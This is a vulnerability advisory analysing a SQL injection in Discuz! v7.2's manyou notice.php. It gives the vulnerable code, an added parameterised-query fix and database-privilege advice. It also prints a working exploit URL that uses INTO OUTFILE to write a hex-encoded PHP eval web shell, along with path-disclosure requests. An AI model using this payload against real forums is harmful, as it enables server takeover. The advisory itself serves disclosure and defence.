Discuz! v7.2 injection vulnerability analysis and exploit - vulnerability warning - the black bar safety net

2010-03-11T00:00:00
ID MYHACK58:62201026392
Type myhack58
Reporter Anonymous
Modified 2010-03-11T00:00:00

Description

Vulnerability analysis: file ./manyou/sources/notice.php

The relevant code:

if($option == 'del') {
    $appid = intval($_GET['appid']);
    $db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
    showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
    $hash = trim($_GET['hash']); // not filtered here: $hash goes straight into the SQL below, which is what makes the injection possible
    if($action == 'invite') {
        $query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
        if($value = $db->fetch_array($query)) {
            $db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
            showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
        } else {
            showmessage('manyou:noperm');
        }
    } else {
        $db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");
        showmessage('manyou:done', 'userapp.php?script=notice');
    }
}

A very simple vulnerability. Because the query results are never returned to the page, a blind injection is usually the only option; but if the current database account has the FILE privilege (File_priv), we can also write directly to disk with INTO OUTFILE.
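Added example, not Discuz! code: a hardened rewrite of the 'deluserapp' branch shown above. It assumes (none of this is from the page) that $db is a mysqli connection, that $tablepre comes from the site configuration and never from the request, and that the invite hash column holds a short alphanumeric token. The point is that the request value is whitelisted and then bound as a parameter, so a quote inside it can no longer close the string literal the way the page's payload does.

```php
<?php
// Added example (not the project's own code). Assumed: $db is a mysqli connection,
// $tablepre is a trusted config value, invite hashes are short alphanumeric tokens.

// Whitelist the request parameter before it gets anywhere near SQL. The allowed
// character set and length are assumptions about Discuz!'s invite hash format.
function is_valid_hash(string $hash): bool
{
    return preg_match('/^[A-Za-z0-9]{1,64}$/', $hash) === 1;
}

// Delete an invite by hash with a parameterised query. The user-supplied value is
// bound as data; a payload such as hash=' union select ... fails the whitelist and,
// even if it did not, could not break out of the bound parameter.
function delete_invite(mysqli $db, string $tablepre, string $hash, int $uid): bool
{
    if (!is_valid_hash($hash)) {
        return false;   // caller reports 'manyou:noperm', as the original does on no match
    }
    $stmt = $db->prepare("DELETE FROM {$tablepre}myinvite WHERE hash = ? AND touid = ?");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('si', $hash, $uid);
    $ok = $stmt->execute() && $stmt->affected_rows > 0;
    $stmt->close();
    return $ok;
}

// The non-invite branch compares id='$hash'. The id is an integer, so the same
// intval() the original 'del' branch already applies to appid is enough here.
function delete_notice(mysqli $db, string $tablepre, string $hash, int $uid): bool
{
    $id = intval($hash);
    if ($id <= 0) {
        return false;
    }
    $stmt = $db->prepare("DELETE FROM {$tablepre}mynotice WHERE id = ? AND uid = ?");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('ii', $id, $uid);
    $ok = $stmt->execute() && $stmt->affected_rows > 0;
    $stmt->close();
    return $ok;
}

// Request handling mirroring the original branch; the raw $_GET value never reaches SQL.
// Returns the message key the original passes to showmessage().
function handle_deluserapp(mysqli $db, string $tablepre, string $action, int $discuz_uid): string
{
    $hash = trim((string) ($_GET['hash'] ?? ''));
    if ($action == 'invite') {
        return delete_invite($db, $tablepre, $hash, $discuz_uid) ? 'manyou:done' : 'manyou:noperm';
    }
    // The original always reports 'manyou:done' on this branch; the return value is ignored here too.
    delete_notice($db, $tablepre, $hash, $discuz_uid);
    return 'manyou:done';
}
```

The code fix removes the injection itself; the INTO OUTFILE step the page relies on is separately closed by running the web application under a database account without the FILE privilege (and, on MySQL, by setting secure_file_priv), so that even an injection that is missed cannot write files to the web root.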

/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504f53545b274f275d293b3f3e,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23

Here 0x3C3F70687020406576616C28245F504f53545b274f275d293b3f3e is the hexadecimal representation of <?php @eval($_POST['O']);?>.

But to use INTO OUTFILE we also need the physical path of the web root, and in PHP's case disclosing that path is not rare.

/manyou/admincp.php?my_suffix=%0A%0DTOBY57

[Screenshot: Discuz! v7.2 injection vulnerability analysis and exploitation (Minghacker)]

/manyou/userapp.php?%0D%0A=TOBY57

[Screenshot: Discuz! v7.2 injection vulnerability analysis and exploitation (Minghacker)]

With the path in hand, the only thing left is the INTO OUTFILE step.